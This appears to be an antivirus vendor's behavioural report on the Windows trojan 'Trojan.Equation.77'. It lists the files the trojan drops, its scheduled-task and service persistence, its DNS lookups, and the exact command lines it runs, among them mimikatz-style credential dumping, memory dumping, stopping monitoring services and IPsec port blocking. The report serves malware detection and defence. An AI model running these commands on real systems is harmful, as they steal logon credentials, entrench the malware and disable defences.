Trojan.Equation.77

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%WINDIR%\tasks\qviiznifj.job
%WINDIR%\tasks\rqzutncmc.job
%WINDIR%\tasks\neunqplvn.job

Creates the following services

[<HKLM>\System\CurrentControlSet\Services\bettcqpnk] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\bettcqpnk] 'ImagePath' = '%WINDIR%\bemlnbnq\bjunugn.exe'
[<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\npf] 'ImagePath' = 'system32\drivers\npf.sys'
[<HKLM>\SYSTEM\CurrentControlSet\Services\NPF] 'Start' = '00000002'

Malicious functions

Executes the following

'<SYSTEM32>\net.exe' stop "Boundary Meter"
'<SYSTEM32>\net.exe' stop "TrueSight Meter"
'<SYSTEM32>\net.exe' stop npf

Modifies file system

Creates the following files

%WINDIR%\bemlnbnq\bjunugn.exe
%WINDIR%\negfcnmzt\unattendgc\specials\zlib1.dll
%WINDIR%\negfcnmzt\unattendgc\specials\svschost.exe
%WINDIR%\negfcnmzt\unattendgc\specials\spoolsrv.exe
%WINDIR%\negfcnmzt\unattendgc\specials\vimpcsvc.exe
%WINDIR%\negfcnmzt\unattendgc\specials\docmicfg.exe
%WINDIR%\negfcnmzt\unattendgc\specials\schoedcl.exe
%WINDIR%\negfcnmzt\unattendgc\svschost.xml
%WINDIR%\negfcnmzt\unattendgc\spoolsrv.xml
%WINDIR%\negfcnmzt\unattendgc\vimpcsvc.xml
%WINDIR%\negfcnmzt\unattendgc\docmicfg.xml
%WINDIR%\negfcnmzt\unattendgc\schoedcl.xml
%WINDIR%\negfcnmzt\unattendgc\specials\svschost.xml
%WINDIR%\negfcnmzt\unattendgc\specials\spoolsrv.xml
%WINDIR%\negfcnmzt\unattendgc\specials\vimpcsvc.xml
%WINDIR%\negfcnmzt\unattendgc\specials\docmicfg.xml
%WINDIR%\negfcnmzt\unattendgc\specials\schoedcl.xml
%WINDIR%\bemlnbnq\svschost.xml
%WINDIR%\temp\vqihmicrq\config.json
%WINDIR%\temp\vqihmicrq\ezigzs.exe
%WINDIR%\ime\bjunugn.exe
%WINDIR%\negfcnmzt\upbdrjv\swrpwe.exe
%WINDIR%\negfcnmzt\corporate\mimilib.dll
%WINDIR%\negfcnmzt\corporate\mimidrv.sys
%WINDIR%\negfcnmzt\unattendgc\appcapture32.dll
%WINDIR%\negfcnmzt\corporate\vfshost.exe
%WINDIR%\negfcnmzt\unattendgc\appcapture64.dll
%WINDIR%\negfcnmzt\unattendgc\shellcode.ini
%WINDIR%\bemlnbnq\schoedcl.xml
%WINDIR%\bemlnbnq\docmicfg.xml
%WINDIR%\bemlnbnq\vimpcsvc.xml
%WINDIR%\bemlnbnq\spoolsrv.xml
%WINDIR%\temp\negfcnmzt\zypivviqn.exe
%WINDIR%\negfcnmzt\unattendgc\specials\xdvl-0.dll
%WINDIR%\negfcnmzt\unattendgc\specials\ucl.dll
%WINDIR%\negfcnmzt\unattendgc\specials\tucl-1.dll
%WINDIR%\negfcnmzt\fytwniveh\wpcap.exe
%WINDIR%\temp\nsb2.tmp
%WINDIR%\temp\nsb3.tmp\options.ini
%WINDIR%\temp\nsb3.tmp\final.ini
%WINDIR%\temp\nsb3.tmp\system.dll
%WINDIR%\temp\nsb3.tmp\nsexec.dll
%WINDIR%\temp\nsb3.tmp\ns4.tmp
%WINDIR%\temp\nsb3.tmp\ns5.tmp
%WINDIR%\temp\nsb3.tmp\ns6.tmp
<SYSTEM32>\pthreadvc.dll
<SYSTEM32>\wpcap.dll
<SYSTEM32>\packet.dll
%ProgramFiles%\winpcap\rpcapd.exe
%ProgramFiles%\winpcap\license
%ProgramFiles%\winpcap\uninstall.exe
<DRIVERS>\npf.sys
%WINDIR%\temp\nsb3.tmp\ns7.tmp
%WINDIR%\negfcnmzt\unattendgc\specials\trch-1.dll
%WINDIR%\negfcnmzt\unattendgc\specials\tibe-2.dll
%WINDIR%\negfcnmzt\unattendgc\specials\ssleay32.dll
%WINDIR%\negfcnmzt\unattendgc\specials\posh-0.dll
%WINDIR%\negfcnmzt\unattendgc\specials\libxml2.dll
%WINDIR%\negfcnmzt\unattendgc\specials\libeay32.dll
%WINDIR%\negfcnmzt\unattendgc\specials\crli-0.dll
%WINDIR%\negfcnmzt\unattendgc\specials\exma-1.dll
%WINDIR%\negfcnmzt\unattendgc\specials\coli-0.dll
%WINDIR%\negfcnmzt\unattendgc\specials\cnli-1.dll
%WINDIR%\negfcnmzt\fytwniveh\ehsbqbtnv.exe
%WINDIR%\negfcnmzt\fytwniveh\wpcap.dll
%WINDIR%\negfcnmzt\fytwniveh\packet.dll
%WINDIR%\negfcnmzt\fytwniveh\zetkfignj.exe
%WINDIR%\negfcnmzt\unattendgc\specials\trfo-2.dll
%WINDIR%\negfcnmzt\corporate\log.txt

Sets the 'hidden' attribute to the following files

%WINDIR%\bemlnbnq\svschost.xml
%WINDIR%\bemlnbnq\spoolsrv.xml
%WINDIR%\bemlnbnq\vimpcsvc.xml
%WINDIR%\bemlnbnq\docmicfg.xml
%WINDIR%\bemlnbnq\schoedcl.xml

Deletes the following files

%WINDIR%\temp\nsb3.tmp\ns4.tmp
%WINDIR%\temp\nsb3.tmp\ns5.tmp
%WINDIR%\temp\nsb3.tmp\ns6.tmp
%WINDIR%\temp\nsb3.tmp\ns7.tmp
%WINDIR%\temp\nsb3.tmp\final.ini
%WINDIR%\temp\nsb3.tmp\nsexec.dll
%WINDIR%\temp\nsb3.tmp\options.ini
%WINDIR%\temp\nsb3.tmp\system.dll

Modifies the HOSTS file.

Moves itself

from <Full path to file> to %TEMP%\977435\...\temporaryfile

Network activity

UDP

DNS ASK ui#.#ognoob.se
DNS ASK ui#.###oherohero.info
DNS ASK yx#.#ognoob.se
DNS ASK 20####.ip138.com

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: 'ehsbqbtnv.exe'
ClassName: '' WindowName: 'zetkfignj.exe'
ClassName: '' WindowName: 'swrpwe.exe'
ClassName: '' WindowName: 'spoolsrv.exe'
ClassName: '' WindowName: 'svschost.exe'
ClassName: '' WindowName: 'scvhost.exe'
ClassName: '' WindowName: 'wmic.exe'
ClassName: '' WindowName: 'vfshost.exe'
ClassName: '' WindowName: 'vimpcsvc.exe'
ClassName: '' WindowName: 'docmicfg.exe'
ClassName: '' WindowName: 'schoedcl.exe'

Creates and executes the following

'%WINDIR%\bemlnbnq\bjunugn.exe'
'%WINDIR%\temp\negfcnmzt\zypivviqn.exe' -accepteula -mp 1776 %WINDIR%\TEMP\negfcnmzt\1776.dmp
'%WINDIR%\temp\vqihmicrq\ezigzs.exe'
'%WINDIR%\negfcnmzt\corporate\vfshost.exe' privilege::debug sekurlsa::logonpasswords exit
'%WINDIR%\temp\nsb3.tmp\ns6.tmp' net stop npf
'%WINDIR%\temp\nsb3.tmp\ns7.tmp' net start npf
'%WINDIR%\temp\nsb3.tmp\ns4.tmp' net stop "Boundary Meter"
'%WINDIR%\temp\negfcnmzt\zypivviqn.exe' -accepteula -mp 1460 %WINDIR%\TEMP\negfcnmzt\1460.dmp
'%WINDIR%\temp\nsb3.tmp\ns5.tmp' net stop "TrueSight Meter"
'%WINDIR%\negfcnmzt\fytwniveh\wpcap.exe' /S
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "qviiznifj" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\vqihmicrq\ezigzs.exe /p everyone:F"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 5 & Start %WINDIR%\bemlnbnq\bjunugn.exe' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "neunqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\bemlnbnq\bjunugn.exe /p everyone:F"' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static set policy name=Bastards assign=y' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "rqzutncmc" /ru system /tr "cmd /c %WINDIR%\ime\bjunugn.exe"' (with hidden window)
'%WINDIR%\temp\negfcnmzt\zypivviqn.exe' -accepteula -mp 1460 %WINDIR%\TEMP\negfcnmzt\1460.dmp' (with hidden window)
'<SYSTEM32>\cmd.exe' /c net start npf' (with hidden window)
'%WINDIR%\temp\nsb3.tmp\ns4.tmp' net stop "Boundary Meter"' (with hidden window)
'%WINDIR%\temp\negfcnmzt\zypivviqn.exe' -accepteula -mp 1776 %WINDIR%\TEMP\negfcnmzt\1776.dmp' (with hidden window)
'%WINDIR%\temp\nsb3.tmp\ns6.tmp' net stop npf' (with hidden window)
'%WINDIR%\temp\nsb3.tmp\ns5.tmp' net stop "TrueSight Meter"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\negfcnmzt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %WINDIR%\negfcnmzt\Corporate\log.txt' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\negfcnmzt\fytwniveh\wpcap.exe /S' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filteraction name=BastardsList action=block' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add policy name=Bastards description=FuckingBastards' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static del all' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|cacls <DRIVERS>\etc\hosts /T /D users & echo Y|cacls <DRIVERS>\etc\hosts /T /D administrators & echo Y|cacls <DRIVERS>\etc\hosts /T /D SYSTEM' (with hidden window)
'%WINDIR%\temp\nsb3.tmp\ns7.tmp' net start npf' (with hidden window)
'%WINDIR%\temp\vqihmicrq\ezigzs.exe' ' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 5 & Start %WINDIR%\bemlnbnq\bjunugn.exe
'<SYSTEM32>\netsh.exe' ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
'<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "rqzutncmc" /ru system /tr "cmd /c %WINDIR%\ime\bjunugn.exe"
'<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "neunqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\bemlnbnq\bjunugn.exe /p everyone:F"
'<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "qviiznifj" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\vqihmicrq\ezigzs.exe /p everyone:F"
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "neunqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\bemlnbnq\bjunugn.exe /p everyone:F"
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "qviiznifj" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\vqihmicrq\ezigzs.exe /p everyone:F"
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "rqzutncmc" /ru system /tr "cmd /c %WINDIR%\ime\bjunugn.exe"
'<SYSTEM32>\cmd.exe' /c %WINDIR%\negfcnmzt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %WINDIR%\negfcnmzt\Corporate\log.txt
'<SYSTEM32>\cmd.exe' /c net start npf
'<SYSTEM32>\net1.exe' start npf
'<SYSTEM32>\netsh.exe' ipsec static set policy name=Bastards assign=y
'<SYSTEM32>\net.exe' start npf
'<SYSTEM32>\net1.exe' stop "TrueSight Meter"
'<SYSTEM32>\net1.exe' stop "Boundary Meter"
'<SYSTEM32>\cmd.exe' /c %WINDIR%\negfcnmzt\fytwniveh\wpcap.exe /S
'<SYSTEM32>\netsh.exe' ipsec static add filteraction name=BastardsList action=block
'<SYSTEM32>\netsh.exe' ipsec static add policy name=Bastards description=FuckingBastards
'<SYSTEM32>\netsh.exe' ipsec static del all
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D SYSTEM
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D administrators
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D users
'<SYSTEM32>\cmd.exe' /S /D /c" echo Y"
'<SYSTEM32>\cmd.exe' /c echo Y|cacls <DRIVERS>\etc\hosts /T /D users & echo Y|cacls <DRIVERS>\etc\hosts /T /D administrators & echo Y|cacls <DRIVERS>\etc\hosts /T /D SYSTEM
'<SYSTEM32>\ping.exe' 127.0.0.1 -n 5
'<SYSTEM32>\net1.exe' stop npf
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial